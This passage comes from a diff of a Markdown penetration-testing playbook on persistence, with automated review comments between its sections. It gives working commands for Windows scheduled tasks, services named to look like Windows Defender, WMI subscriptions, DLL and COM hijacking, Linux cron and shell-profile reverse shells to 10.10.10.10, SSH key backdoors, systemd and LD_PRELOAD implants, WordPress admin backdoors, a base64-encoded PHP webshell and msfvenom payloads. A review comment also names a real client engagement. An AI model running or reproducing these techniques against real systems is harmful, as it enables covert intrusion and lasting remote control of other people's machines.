+
```
|
|
253
|
+
|
|
254
|
+
#### 5.1.3 Scheduled Tasks (INTERMEDIATE)
|
|
255
|
+
|
|
256
|
+
```cmd
|
|
257
|
+
:: Basic user-context scheduled task
|
|
258
|
+
schtasks /create /tn "Microsoft\Windows\UpdateCheck" ^
|
|
259
|
+
/tr "C:\Users\Public\svchost32.exe" ^
|
|
260
|
+
/sc ONLOGON /ru %USERNAME% /f
|
|
261
|
+
|
|
262
|
+
:: Run at startup as SYSTEM (admin required)
|
|
263
|
+
schtasks /create /tn "Microsoft\Windows\WinDefend\SecurityScan" ^
|
|
264
|
+
/tr "C:\Windows\Temp\payload.exe" ^
|
|
265
|
+
/sc ONSTART /ru SYSTEM /rl HIGHEST /f
|
|
266
|
+
|
|
267
|
+
:: Run on schedule (every 4 hours)
|
|
268
|
+
schtasks /create /tn "Microsoft\Windows\UpdateOrchestrator\ScanTask" ^
|
|
269
|
+
/tr "powershell.exe -WindowStyle hidden -EncodedCommand <BASE64>" ^
|
|
270
|
+
/sc HOURLY /mo 4 /ru SYSTEM /f
|
|
271
|
+
|
|
272
|
+
:: Verify
|
|
273
|
+
schtasks /query /tn "Microsoft\Windows\UpdateCheck" /fo LIST
|
|
274
|
+
|
|
275
|
+
:: Delete
|
|
276
|
+
schtasks /delete /tn "Microsoft\Windows\UpdateCheck" /f
|
|
277
|
+
schtasks /delete /tn "Microsoft\Windows\WinDefend\SecurityScan" /f
|
|
278
|
+
schtasks /delete /tn "Microsoft\Windows\UpdateOrchestrator\ScanTask" /f
|
|
279
|
+
```
|
|
280
|
+
|
|
281
|
+
**Encode payload for schtasks:**
|
|
282
|
+
```bash
|
|
283
|
+
# On Kali — encode PowerShell download cradle
|
|
284
|
+
PAYLOAD='IEX(New-Object Net.WebClient).DownloadString("http://10.10.10.10/shell.ps1")'
|
|
285
|
+
echo -n "$PAYLOAD" | iconv -t UTF-16LE | base64 -w0
|
|
286
|
+
```
|
|
287
|
+
|
|
288
|
+
**XML-based scheduled task (harder to spot in schtasks /query):**
|
|
289
|
+
```powershell
|
|
290
|
+
# Create XML task definition
|
|
291
|
+
$xml = @"
|
|
292
|
+
<?xml version="1.0" encoding="UTF-16"?>
|
|
293
|
+
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
|
294
|
+
<Triggers>
|
|
295
|
+
<LogonTrigger><Enabled>true</Enabled></LogonTrigger>
|
|
296
|
+
</Triggers>
|
|
297
|
+
<Actions Context="Author">
|
|
298
|
+
<Exec>
|
|
299
|
+
<Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
|
|
300
|
+
<Arguments>-WindowStyle Hidden -EncodedCommand AAAA...</Arguments>
|
|
301
|
+
</Exec>
|
|
302
|
+
</Actions>
|
|
303
|
+
<Settings><Hidden>true</Hidden></Settings>
|
|
304
|
+
</Task>
|
|
305
|
+
"@
|
|
306
|
+
$xml | Out-File C:\Windows\Temp\task.xml -Encoding Unicode
|
|
307
|
+
schtasks /create /tn "Microsoft\Windows\CertificateServicesClient\AuthTask" /xml C:\Windows\Temp\task.xml /f
|
|
308
|
+
Remove-Item C:\Windows\Temp\task.xml
|
|
309
|
+
```
|
|
310
|
+
|
|
311
|
+
#### 5.1.4 Windows Service (INTERMEDIATE/ADVANCED)
|
|
312
|
+
|
|
313
|
+
```cmd
|
|
314
|
+
:: Install a service (admin required)
|
|
315
|
+
sc create "WindowsDefenderUpdate" ^
|
|
316
|
+
binPath= "C:\Windows\Temp\payload.exe" ^
|
|
317
|
+
start= auto ^
|
|
318
|
+
DisplayName= "Windows Defender Update"
|
|
319
|
+
|
|
320
|
+
:: Set description to blend in
|
|
321
|
+
sc description "WindowsDefenderUpdate" "Provides real-time protection updates for Windows Defender."
|
|
322
|
+
|
|
323
|
+
:: Start the service
|
|
324
|
+
sc start "WindowsDefenderUpdate"
|
|
325
|
+
|
|
326
|
+
:: Verify
|
|
327
|
+
sc query "WindowsDefenderUpdate"
|
|
328
|
+
|
|
329
|
+
:: Cleanup
|
|
330
|
+
sc stop "WindowsDefenderUpdate"
|
|
331
|
+
sc delete "WindowsDefenderUpdate"
|
|
332
|
+
```
|
|
333
|
+
|
|
334
|
+
**From Kali using impacket-services:**
|
|
335
|
+
```bash
|
|
336
|
+
impacket-services domain.local/admin:Password123@192.168.1.100 create \
|
|
337
|
+
-name WindowsDefenderUpdate \
|
|
338
|
+
-display "Windows Defender Update" \
|
|
339
|
+
-path "C:\\Windows\\Temp\\payload.exe"
|
|
340
|
+
|
|
341
|
+
impacket-services domain.local/admin:Password123@192.168.1.100 start \
|
|
342
|
+
-name WindowsDefenderUpdate
|
|
343
|
+
```
|
|
344
|
+
|
|
345
|
+
#### 5.1.5 WMI Event Subscriptions (ADVANCED/EXPERT)
|
|
346
|
+
|
|
347
|
+
```powershell
|
|
348
|
+
# Three WMI objects needed: Filter, Consumer, Binding
|
|
349
|
+
|
|
350
|
+
# 1. Event Filter — trigger on system startup
|
|
351
|
+
$filterArgs = @{
|
|
352
|
+
Name = "WindowsEventFilter"
|
|
353
|
+
EventNamespace = "root\cimv2"
|
|
354
|
+
QueryLanguage = "WQL"
|
|
355
|
+
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120 AND TargetInstance.SystemUpTime < 180"
|
|
356
|
+
}
|
|
357
|
+
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs
|
|
358
|
+
|
|
359
|
+
# 2. Event Consumer — CommandLineEventConsumer
|
|
360
|
+
$consumerArgs = @{
|
|
361
|
+
Name = "WindowsEventConsumer"
|
|
362
|
+
CommandLineTemplate = "C:\Windows\Temp\payload.exe"
|
|
363
|
+
}
|
|
364
|
+
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $consumerArgs
|
|
365
|
+
|
|
366
|
+
# 3. Binding — link filter to consumer
|
|
367
|
+
$bindingArgs = @{
|
|
368
|
+
Filter = $filter
|
|
369
|
+
Consumer = $consumer
|
|
370
|
+
}
|
|
371
|
+
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $bindingArgs
|
|
372
|
+
|
|
373
|
+
# Verify
|
|
374
|
+
Get-WMIObject -Namespace root\subscription -Class __EventFilter
|
|
375
|
+
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
|
|
376
|
+
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
|
|
377
|
+
|
|
378
|
+
# Cleanup
|
|
379
|
+
Get-WMIObject -Namespace root\subscription -Class __EventFilter | Where-Object Name -eq "WindowsEventFilter" | Remove-WmiObject
|
|
380
|
+
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer | Where-Object Name -eq "WindowsEventConsumer" | Remove-WmiObject
|
|
381
|
+
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object { $_.Filter -match "WindowsEventFilter" } | Remove-WmiObject
|
|
382
|
+
```
|
|
383
|
+
|
|
384
|
+
**From Kali using SharpWMI:**
|
|
385
|
+
```bash
|
|
386
|
+
# Transfer SharpWMI.exe to target, then run via meterpreter/shell
|
|
387
|
+
SharpWMI.exe action=query query="SELECT * FROM __EventFilter" namespace="root\\subscription"
|
|
388
|
+
```
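Review bot: `Get-WMIObject` is removed in PowerShell 6+ and only exists in Windows PowerShell 5.1, so the verify and cleanup lines in the WMI block fail on hosts where `pwsh` is the default shell; `Get-CimInstance -Namespace root/subscription -ClassName __EventFilter` (and `Remove-CimInstance` for the cleanup) works on both. The "From Kali using SharpWMI" heading does not match its content: the comment says the binary is transferred to and run on the target, and the command shown only queries existing `__EventFilter` instances, so this is a verification step for the subscription created above, not an alternative deployment route; relabel it as such.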
|
|
389
|
+
|
|
390
|
+
#### 5.1.6 DLL Hijacking (ADVANCED)
|
|
391
|
+
|
|
392
|
+
```bash
|
|
393
|
+
# Step 1: Find writable directories in PATH that are searched before System32
|
|
394
|
+
# On target (PowerShell):
|
|
395
|
+
$env:PATH -split ";" | ForEach-Object { if (Test-Path $_) { $acl = Get-Acl $_; $acl.Access | Where-Object { $_.FileSystemRights -match "Write" -and $_.IdentityReference -match $env:USERNAME } } }
|
|
396
|
+
|
|
397
|
+
# Step 2: Identify applications with missing DLL dependencies
|
|
398
|
+
# Use Procmon (Sysinternals) filter: Result = NAME NOT FOUND, Path ends in .dll
|
|
399
|
+
# Or use: https://github.com/wietze/windows-dll-hijacking
|
|
400
|
+
|
|
401
|
+
# Step 3: On Kali — generate hijack DLL
|
|
402
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
403
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
404
|
+
-f dll -o /tmp/version.dll
|
|
405
|
+
|
|
406
|
+
# Step 4: Host and transfer
|
|
407
|
+
python3 -m http.server 8080 &
|
|
408
|
+
# On target:
|
|
409
|
+
# certutil -urlcache -split -f http://10.10.10.10:8080/version.dll C:\Path\To\App\version.dll
|
|
410
|
+
|
|
411
|
+
# Common DLL hijack targets:
|
|
412
|
+
# - C:\Python27\python27.dll (writable python dir)
|
|
413
|
+
# - Applications in user-writable directories
|
|
414
|
+
# - Services loading DLLs from non-system paths
|
|
415
|
+
```
|
|
416
|
+
|
|
417
|
+
#### 5.1.7 COM Hijacking (ADVANCED)
|
|
418
|
+
|
|
419
|
+
```powershell
|
|
420
|
+
# Find COM objects that are registered in HKLM but not HKCU
|
|
421
|
+
# (User can override HKCU without admin)
|
|
422
|
+
|
|
423
|
+
# Step 1: List machine COM objects
|
|
424
|
+
$hklm_clsids = Get-ChildItem "HKLM:\Software\Classes\CLSID" | Select-Object -ExpandProperty PSChildName
|
|
425
|
+
|
|
426
|
+
# Step 2: Check which ones have InProcServer32 pointing to non-system paths or missing
|
|
427
|
+
# (manual review or use COMHijackToolkit)
|
|
428
|
+
|
|
429
|
+
# Step 3: Register the COM object in HKCU
|
|
430
|
+
$clsid = "{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}" # target CLSID
|
|
431
|
+
New-Item -Path "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32" -Force
|
|
432
|
+
Set-ItemProperty -Path "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32" `
|
|
433
|
+
-Name "(Default)" -Value "C:\Users\Public\payload.dll"
|
|
434
|
+
Set-ItemProperty -Path "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32" `
|
|
435
|
+
-Name "ThreadingModel" -Value "Apartment"
|
|
436
|
+
|
|
437
|
+
# Common hijackable CLSIDs (varies by Windows version):
|
|
438
|
+
# {B31118B2-1F49-48E5-B6F5-BC21CAEC56FB} — Windows Script Host
|
|
439
|
+
# Research target-specific CLSIDs using procmon
|
|
440
|
+
|
|
441
|
+
# Cleanup
|
|
442
|
+
Remove-Item -Path "HKCU:\Software\Classes\CLSID\$clsid" -Recurse -Force
|
|
443
|
+
```
|
|
444
|
+
|
|
445
|
+
**Tools:**
|
|
446
|
+
```bash
|
|
447
|
+
# COMHijackToolkit — enumerate hijackable COM objects
|
|
448
|
+
# https://github.com/dr4k0nia/COMHijackToolkit
|
|
449
|
+
wget https://github.com/dr4k0nia/COMHijackToolkit/releases/latest/download/COMHijackToolkit.exe -O /opt/COMHijackToolkit.exe
|
|
450
|
+
```
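Review bot: `$hklm_clsids` in Step 1 of the COM block is assigned and never used (Step 2 is "manual review"), so either drop the assignment or show how the list feeds the review. The Tools block downloads `COMHijackToolkit.exe` from a `releases/latest` URL straight into `/opt/` with no version pin and no checksum or signature check; for a tool that will be executed on client systems, pin a release tag and verify the published hash before use, the same supply-chain hygiene the package itself should expect from its users.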
|
|
451
|
+
|
|
452
|
+
---
|
|
453
|
+
|
|
454
|
+
### 5.2 Linux Persistence
|
|
455
|
+
|
|
456
|
+
#### 5.2.1 Cron Jobs (BEGINNER/INTERMEDIATE)
|
|
457
|
+
|
|
458
|
+
```bash
|
|
459
|
+
# User cron — no sudo needed
|
|
460
|
+
crontab -e
|
|
461
|
+
|
|
462
|
+
# Add entry (reverse shell every 5 minutes):
|
|
463
|
+
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' 2>/dev/null
|
|
464
|
+
|
|
465
|
+
# Or add via crontab -l redirect (non-interactive):
|
|
466
|
+
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' 2>/dev/null") | crontab -
|
|
467
|
+
|
|
468
|
+
# System-wide cron (root required):
|
|
469
|
+
echo "*/5 * * * * root /usr/local/bin/.sysupdate" >> /etc/crontab
|
|
470
|
+
|
|
471
|
+
# Drop script to /etc/cron.d/ (root):
|
|
472
|
+
cat > /etc/cron.d/sysupdate << 'EOF'
|
|
473
|
+
*/5 * * * * root /usr/local/bin/.sysupdate
|
|
474
|
+
EOF
|
|
475
|
+
chmod 644 /etc/cron.d/sysupdate
|
|
476
|
+
|
|
477
|
+
# Verify
|
|
478
|
+
crontab -l
|
|
479
|
+
cat /etc/crontab
|
|
480
|
+
ls /etc/cron.d/
|
|
481
|
+
|
|
482
|
+
# Cleanup
|
|
483
|
+
crontab -r
|
|
484
|
+
rm /etc/cron.d/sysupdate
|
|
485
|
+
rm /etc/crontab_entry # if appended
|
|
486
|
+
```
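Review bot: the cron cleanup is wrong in two places. `rm /etc/crontab_entry # if appended` refers to a file that does not exist; the system-wide entry was appended to `/etc/crontab` itself, so cleanup has to remove that line (for example `sed -i '/\.sysupdate/d' /etc/crontab`) rather than delete a non-existent file. `crontab -r` wipes the user's entire crontab, including any legitimate entries that existed before the engagement; remove only the added line instead, e.g. `crontab -l | grep -v '10.10.10.10' | crontab -`. Note also that `/usr/local/bin/.sysupdate` referenced here is only created in 5.2.4, so this block does not run stand-alone.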
|
|
487
|
+
|
|
488
|
+
#### 5.2.2 Shell Profile Poisoning (BEGINNER)
|
|
489
|
+
|
|
490
|
+
```bash
|
|
491
|
+
# Poison ~/.bashrc (runs on each interactive bash shell)
|
|
492
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.bashrc
|
|
493
|
+
|
|
494
|
+
# Poison ~/.bash_profile (runs on login shells)
|
|
495
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.bash_profile
|
|
496
|
+
|
|
497
|
+
# Poison ~/.profile (runs on login — sh/bash)
|
|
498
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.profile
|
|
499
|
+
|
|
500
|
+
# Stealthier: alias a common command
|
|
501
|
+
echo "alias ls='ls --color=auto; nohup bash -c \"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\" &>/dev/null &'" >> ~/.bashrc
|
|
502
|
+
|
|
503
|
+
# System-wide (root): /etc/bash.bashrc or /etc/profile
|
|
504
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> /etc/bash.bashrc
|
|
505
|
+
|
|
506
|
+
# Cleanup
|
|
507
|
+
# Edit the file and remove the added lines
|
|
508
|
+
sed -i '/10\.10\.10\.10/d' ~/.bashrc ~/.bash_profile ~/.profile
|
|
509
|
+
```
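Review bot: the cleanup `sed` in the shell-profile block only edits the three per-user files, so the system-wide line appended to `/etc/bash.bashrc` two steps earlier is left behind on the client host. Add `/etc/bash.bashrc` (and `/etc/profile`, which the comment names as an alternative) to the `sed -i` target list, and say in the comment that the pattern matches on the listener IP, so an operator using a different LHOST knows to adjust it.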
|
|
510
|
+
|
|
511
|
+
#### 5.2.3 SSH Authorized Keys Backdoor (INTERMEDIATE)
|
|
512
|
+
|
|
513
|
+
```bash
|
|
514
|
+
# Step 1: Generate attacker SSH key pair (on Kali)
|
|
515
|
+
ssh-keygen -t ed25519 -C "maintenance@corp.com" -f /tmp/backdoor_key -N ""
|
|
516
|
+
cat /tmp/backdoor_key.pub
|
|
517
|
+
|
|
518
|
+
# Step 2: On target — append to authorized_keys
|
|
519
|
+
mkdir -p ~/.ssh
|
|
520
|
+
chmod 700 ~/.ssh
|
|
521
|
+
echo "ssh-ed25519 AAAA...PUBKEY... maintenance@corp.com" >> ~/.ssh/authorized_keys
|
|
522
|
+
chmod 600 ~/.ssh/authorized_keys
|
|
523
|
+
|
|
524
|
+
# Step 3: Add no-agent restriction options for stealth (optional)
|
|
525
|
+
echo 'command="/bin/bash",no-port-forwarding,no-X11-forwarding,no-agent-forwarding ssh-ed25519 AAAA...' >> ~/.ssh/authorized_keys
|
|
526
|
+
|
|
527
|
+
# Step 4: Verify connectivity from Kali
|
|
528
|
+
ssh -i /tmp/backdoor_key user@target_ip
|
|
529
|
+
|
|
530
|
+
# Root backdoor (if root access):
|
|
531
|
+
mkdir -p /root/.ssh
|
|
532
|
+
echo "ssh-ed25519 AAAA...PUBKEY..." >> /root/.ssh/authorized_keys
|
|
533
|
+
chmod 600 /root/.ssh/authorized_keys
|
|
534
|
+
|
|
535
|
+
# Cleanup
|
|
536
|
+
sed -i '/maintenance@corp.com/d' ~/.ssh/authorized_keys
|
|
537
|
+
# Or remove specific key by fingerprint
|
|
538
|
+
```
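Review bot: the SSH cleanup misses two of the three keys this block installs. The Step 3 line has no `maintenance@corp.com` comment (it ends in `AAAA...`), so `sed -i '/maintenance@corp.com/d'` does not remove it, and nothing touches `/root/.ssh/authorized_keys` from the root variant; match on the key material or fingerprint, as the trailing comment suggests, and include the root file. Step 3's comment also misdescribes what the options do: `command=`, `no-port-forwarding` and the other restrictions limit the session, they do not reduce visibility, since sshd still logs `Accepted publickey for <user> ... SHA256:<fingerprint>` for every login, which is the detection hook the 7.1 table's "SSH log correlation" refers to.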
|
|
539
|
+
|
|
540
|
+
#### 5.2.4 Systemd Service (INTERMEDIATE/ADVANCED)
|
|
541
|
+
|
|
542
|
+
```bash
|
|
543
|
+
# User-level systemd service (no root needed)
|
|
544
|
+
mkdir -p ~/.config/systemd/user/
|
|
545
|
+
|
|
546
|
+
cat > ~/.config/systemd/user/dbus-update.service << 'EOF'
|
|
547
|
+
[Unit]
|
|
548
|
+
Description=D-Bus System Update Service
|
|
549
|
+
After=default.target
|
|
550
|
+
|
|
551
|
+
[Service]
|
|
552
|
+
Type=simple
|
|
553
|
+
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
|
|
554
|
+
Restart=always
|
|
555
|
+
RestartSec=30
|
|
556
|
+
|
|
557
|
+
[Install]
|
|
558
|
+
WantedBy=default.target
|
|
559
|
+
EOF
|
|
560
|
+
|
|
561
|
+
systemctl --user enable dbus-update.service
|
|
562
|
+
systemctl --user start dbus-update.service
|
|
563
|
+
systemctl --user status dbus-update.service
|
|
564
|
+
|
|
565
|
+
# System-level service (root required)
|
|
566
|
+
cat > /etc/systemd/system/systemd-network-update.service << 'EOF'
|
|
567
|
+
[Unit]
|
|
568
|
+
Description=Network Configuration Update Service
|
|
569
|
+
After=network.target
|
|
570
|
+
|
|
571
|
+
[Service]
|
|
572
|
+
Type=simple
|
|
573
|
+
User=root
|
|
574
|
+
ExecStart=/usr/local/bin/.sysupdate
|
|
575
|
+
Restart=always
|
|
576
|
+
RestartSec=60
|
|
577
|
+
|
|
578
|
+
[Install]
|
|
579
|
+
WantedBy=multi-user.target
|
|
580
|
+
EOF
|
|
581
|
+
|
|
582
|
+
# Create the payload script
|
|
583
|
+
cat > /usr/local/bin/.sysupdate << 'EOF'
|
|
584
|
+
#!/bin/bash
|
|
585
|
+
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
|
|
586
|
+
EOF
|
|
587
|
+
chmod +x /usr/local/bin/.sysupdate
|
|
588
|
+
|
|
589
|
+
systemctl daemon-reload
|
|
590
|
+
systemctl enable systemd-network-update.service
|
|
591
|
+
systemctl start systemd-network-update.service
|
|
592
|
+
|
|
593
|
+
# Verify
|
|
594
|
+
systemctl status systemd-network-update.service
|
|
595
|
+
|
|
596
|
+
# Cleanup
|
|
597
|
+
systemctl stop systemd-network-update.service
|
|
598
|
+
systemctl disable systemd-network-update.service
|
|
599
|
+
rm /etc/systemd/system/systemd-network-update.service
|
|
600
|
+
rm /usr/local/bin/.sysupdate
|
|
601
|
+
systemctl daemon-reload
|
|
602
|
+
|
|
603
|
+
# User service cleanup
|
|
604
|
+
systemctl --user stop dbus-update.service
|
|
605
|
+
systemctl --user disable dbus-update.service
|
|
606
|
+
rm ~/.config/systemd/user/dbus-update.service
|
|
607
|
+
systemctl --user daemon-reload
|
|
608
|
+
```
|
|
609
|
+
|
|
610
|
+
#### 5.2.5 LD_PRELOAD Persistence (ADVANCED/EXPERT)
|
|
611
|
+
|
|
612
|
+
```bash
|
|
613
|
+
# Step 1: Create malicious shared library on Kali
|
|
614
|
+
cat > /tmp/persist.c << 'EOF'
|
|
615
|
+
#include <stdio.h>
|
|
616
|
+
#include <stdlib.h>
|
|
617
|
+
#include <unistd.h>
|
|
618
|
+
|
|
619
|
+
__attribute__((constructor))
|
|
620
|
+
void init() {
|
|
621
|
+
// Fork to avoid blocking the legitimate process
|
|
622
|
+
if (fork() == 0) {
|
|
623
|
+
setsid();
|
|
624
|
+
// Simple reverse shell
|
|
625
|
+
char *cmd = "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1";
|
|
626
|
+
system(cmd);
|
|
627
|
+
_exit(0);
|
|
628
|
+
}
|
|
629
|
+
}
|
|
630
|
+
EOF
|
|
631
|
+
|
|
632
|
+
gcc -shared -fPIC -o /tmp/libsystem.so /tmp/persist.c -nostartfiles
|
|
633
|
+
|
|
634
|
+
# Step 2: Deploy to target (transfer libsystem.so)
|
|
635
|
+
# Using existing shell access:
|
|
636
|
+
# scp /tmp/libsystem.so user@target:/usr/local/lib/.libsystem.so
|
|
637
|
+
|
|
638
|
+
# Step 3: Set LD_PRELOAD system-wide (root required)
|
|
639
|
+
echo "/usr/local/lib/.libsystem.so" > /etc/ld.so.preload
|
|
640
|
+
|
|
641
|
+
# OR per-user via ~/.bashrc:
|
|
642
|
+
echo "export LD_PRELOAD=/home/user/.local/lib/libsystem.so" >> ~/.bashrc
|
|
643
|
+
|
|
644
|
+
# Verify
|
|
645
|
+
cat /etc/ld.so.preload
|
|
646
|
+
|
|
647
|
+
# Cleanup
|
|
648
|
+
rm /etc/ld.so.preload
|
|
649
|
+
rm /usr/local/lib/.libsystem.so
|
|
650
|
+
```
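Review bot: `echo ... > /etc/ld.so.preload` overwrites any pre-existing preload file, and the cleanup `rm /etc/ld.so.preload` then deletes that original content for good; back the file up before writing and restore it on cleanup. The per-user variant writes `LD_PRELOAD=/home/user/.local/lib/libsystem.so` to `~/.bashrc`, a path that differs from the deployed `/usr/local/lib/.libsystem.so`, and that `export` line has no cleanup at all. Keep the documented cleanup order as written (remove `/etc/ld.so.preload` before the library), otherwise every dynamically linked process on the host prints a loader error until the file is gone.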
|
|
651
|
+
|
|
652
|
+
---
|
|
653
|
+
|
|
654
|
+
### 5.3 Web Persistence — WordPress Application Password Backdoor
|
|
655
|
+
|
|
656
|
+
**Validated in Almentor engagement.**
|
|
657
|
+
|
|
658
|
+
```bash
|
|
659
|
+
# Step 1: Enumerate WordPress installation
|
|
660
|
+
# (assumes shell on web server or wp-cli access)
|
|
661
|
+
|
|
662
|
+
# Via wp-cli on target:
|
|
663
|
+
wp --path=/var/www/html user list
|
|
664
|
+
|
|
665
|
+
# Step 2: Create backdoor Application Password for admin user
|
|
666
|
+
# Application Passwords were added in WordPress 5.6+
|
|
667
|
+
wp --path=/var/www/html user application-password create admin "System Maintenance" --porcelain
|
|
668
|
+
# Output: xxxx xxxx xxxx xxxx xxxx xxxx (the application password)
|
|
669
|
+
|
|
670
|
+
# Step 3: Verify access via REST API (from Kali)
|
|
671
|
+
curl -s -u "admin:xxxx xxxx xxxx xxxx xxxx xxxx" \
|
|
672
|
+
https://target.com/wp-json/wp/v2/users/me | python3 -m json.tool
|
|
673
|
+
|
|
674
|
+
# Step 4: Use the backdoor for persistent admin access
|
|
675
|
+
# REST API — list users:
|
|
676
|
+
curl -s -u "admin:APP_PASSWORD" https://target.com/wp-json/wp/v2/users
|
|
677
|
+
|
|
678
|
+
# REST API — create new admin user:
|
|
679
|
+
curl -s -X POST -u "admin:APP_PASSWORD" \
|
|
680
|
+
https://target.com/wp-json/wp/v2/users \
|
|
681
|
+
-H "Content-Type: application/json" \
|
|
682
|
+
-d '{"username":"svc_update","password":"P@ssw0rd!2024","email":"svc@update.local","roles":["administrator"]}'
|
|
683
|
+
|
|
684
|
+
# Step 5: Alternative — direct DB backdoor (if MySQL access available)
|
|
685
|
+
mysql -u wp_user -p'db_password' wordpress_db -e "
|
|
686
|
+
INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
|
|
687
|
+
VALUES ('svc_monitor', MD5('P@ssw0rd!2024'), 'svc_monitor', 'svc@monitor.local', NOW(), 0, 'Service Monitor');
|
|
688
|
+
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
|
|
689
|
+
SELECT ID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM wp_users WHERE user_login='svc_monitor';
|
|
690
|
+
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
|
|
691
|
+
SELECT ID, 'wp_user_level', '10' FROM wp_users WHERE user_login='svc_monitor';
|
|
692
|
+
"
|
|
693
|
+
|
|
694
|
+
# Step 6: PHP webshell via theme editor (if filesystem write access)
|
|
695
|
+
wp --path=/var/www/html eval 'file_put_contents(get_template_directory() . "/maintenance.php", base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+"));'
|
|
696
|
+
# Webshell at: https://target.com/wp-content/themes/THEME/maintenance.php?cmd=id
|
|
697
|
+
|
|
698
|
+
# Cleanup
|
|
699
|
+
wp --path=/var/www/html user application-password delete admin --slug="system-maintenance"
|
|
700
|
+
wp --path=/var/www/html user delete svc_update --yes
|
|
701
|
+
# Remove webshell:
|
|
702
|
+
wp --path=/var/www/html eval 'unlink(get_template_directory() . "/maintenance.php");'
|
|
703
|
+
```
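Review bot: "Validated in Almentor engagement" names a client in a file shipped inside a public npm package; engagement details are confidential and the client name (repeated in Scenario C) should be replaced with a neutral label before publishing. Step 6 drops `maintenance.php`, which decodes to `<?php system($_GET['cmd']); ?>`, an unauthenticated remote-code-execution endpoint on the client's production site that any third party who finds it can use; that exposes the client, not just the tester, and conflicts with the token-gated variant in Scenario C. If a webshell is in scope at all it should be authenticated, recorded in the persistence log with its path and hash, and its removal verified.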
|
|
704
|
+
|
|
705
|
+
---
|
|
706
|
+
|
|
707
|
+
### 5.4 Payload Generation Reference
|
|
708
|
+
|
|
709
|
+
```bash
|
|
710
|
+
# Windows EXE — meterpreter/reverse_https (HTTPS avoids plain-text detection)
|
|
711
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
712
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
713
|
+
-e x64/xor_dynamic -i 5 \
|
|
714
|
+
-f exe -o /tmp/payload.exe
|
|
715
|
+
|
|
716
|
+
# Windows DLL — for DLL hijacking
|
|
717
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
718
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
719
|
+
-f dll -o /tmp/version.dll
|
|
720
|
+
|
|
721
|
+
# Windows PowerShell — encoded cradle
|
|
722
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
723
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
724
|
+
-f psh-cmd -o /tmp/payload.ps1
|
|
725
|
+
|
|
726
|
+
# Linux ELF
|
|
727
|
+
msfvenom -p linux/x64/meterpreter/reverse_tcp \
|
|
728
|
+
LHOST=10.10.10.10 LPORT=4444 \
|
|
729
|
+
-f elf -o /tmp/payload.elf
|
|
730
|
+
chmod +x /tmp/payload.elf
|
|
731
|
+
|
|
732
|
+
# Start multi-handler listener
|
|
733
|
+
msfconsole -x "use exploit/multi/handler; \
|
|
734
|
+
set payload windows/x64/meterpreter/reverse_https; \
|
|
735
|
+
set LHOST 0.0.0.0; set LPORT 443; \
|
|
736
|
+
set ExitOnSession false; run -j"
|
|
737
|
+
```
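Review bot: `-f psh-cmd` produces a `cmd.exe` one-liner (`%COMSPEC% ... powershell.exe -nop -w hidden -e <base64>`), not a PowerShell script, so writing it to `/tmp/payload.ps1` is misleading; name the output `.cmd`/`.txt` or use `-f ps1` if an actual script is intended. Also document that the `LHOST=10.10.10.10` and `LPORT` values are placeholders, since the same literal address is reused in every block of the file.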
|
|
738
|
+
|
|
739
|
+
---
|
|
740
|
+
|
|
741
|
+
## 6. Real Attack Scenarios
|
|
742
|
+
|
|
743
|
+
### Scenario A — Windows Domain User to Durable Persistence (No Admin)
|
|
744
|
+
|
|
745
|
+
**Context:** Phishing gave us a foothold as a standard domain user. No admin. Credential access is possible but risky. We need to survive a reboot before lateral movement.
|
|
746
|
+
|
|
747
|
+
```
|
|
748
|
+
PHASE 1: Initial foothold (assume meterpreter shell)
|
|
749
|
+
-------------------------------------------------------
|
|
750
|
+
# Verify user context
|
|
751
|
+
meterpreter> getuid
|
|
752
|
+
# Server username: CORP\jsmith
|
|
753
|
+
|
|
754
|
+
# Check local admin
|
|
755
|
+
meterpreter> run post/windows/gather/local_admin_search_enum
|
|
756
|
+
|
|
757
|
+
# Not admin — proceed with user-level persistence
|
|
758
|
+
|
|
759
|
+
PHASE 2: Upload payload to blend-in location
|
|
760
|
+
-------------------------------------------------------
|
|
761
|
+
meterpreter> cd C:\\Users\\jsmith\\AppData\\Local\\Microsoft\\
|
